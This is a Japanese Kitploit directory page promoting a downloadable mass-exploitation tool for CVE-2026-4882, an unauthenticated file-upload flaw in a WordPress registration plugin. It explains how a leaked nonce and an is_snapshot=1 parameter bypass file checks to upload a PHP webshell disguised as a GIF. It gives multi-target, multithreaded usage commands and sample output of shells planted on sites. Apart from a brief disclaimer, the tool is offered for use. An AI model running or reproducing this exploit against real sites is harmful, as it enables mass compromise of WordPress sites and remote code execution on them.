Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-4882 — User Registration Advanced Fields <= 1.6.20 - 未認証の任意ファイルアップロード | Kitploit
ツール/GitHubGitHub/xshadow-here/cve-2026-4882
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストレッドチーミング
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - 未認証の任意ファイルアップロード

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - 認証なし任意ファイルアップロード

説明 :

User Registration Advanced Fields <= 1.6.20 - 認証なし任意ファイルアップロード WordPress用プラグイン「User Registration Advanced Fields」(バージョン1.6.20以下) は、AJAXアクション uraf_profile_picture_upload_method_upload を介した認証なし任意ファイルアップロードに対して脆弱です。このプラグインは、登録フォームを含むすべてのページで wp_localize_script() を通じて有効なnonceを漏洩し、is_snapshot=1 パラメータを使用するとファイル拡張子の検証を完全にバイパスします。これにより、認証されていない攻撃者が任意のファイル(例:GIF画像に偽装したPHPウェブシェル)をアップロードできるようになり、ファイルは wp-content/uploads/user_registration_uploads/temp-uploads/ に保存され、完全なリモートコード実行(RCE)につながります。

情報 : CVE-2026-4882

~ CVSSスコア: 9.8 (緊急)

~ 影響を受けるバージョン: <= 1.6.20

  • 研究者 : 0xd4rk5id3 - EnvoraSec

使用方法 :

単一ターゲット :

  • python3 shadow.py -u https://target.com -s shadow.php

複数ターゲット :

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

対話モード :

  • python3 shadow.py
  • ターゲットファイル名を入力
  • スレッド数を1~50で入力

機能 :

  • マルチスレッド
  • エラーハンドリング
  • 自動Nonce + Form ID発見
  • ホームページ&サイトマップクロール(カスタム登録パス)
  • ブルートフォースForm IDフォールバック
  • 自動HTTP/HTTPSリダイレクト解決
  • GIF89aポリグロットシェルアップロード
  • シェル検証
  • 結果をshell.txtに自動保存

出力 :

root@kitploit:~

╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

免責事項 :

このツールは教育およびセキュリティテスト目的のみで使用してください。

自分が所有していない、またはテストする許可がないシステムへの不正使用は違法です。

ツールをダウンロード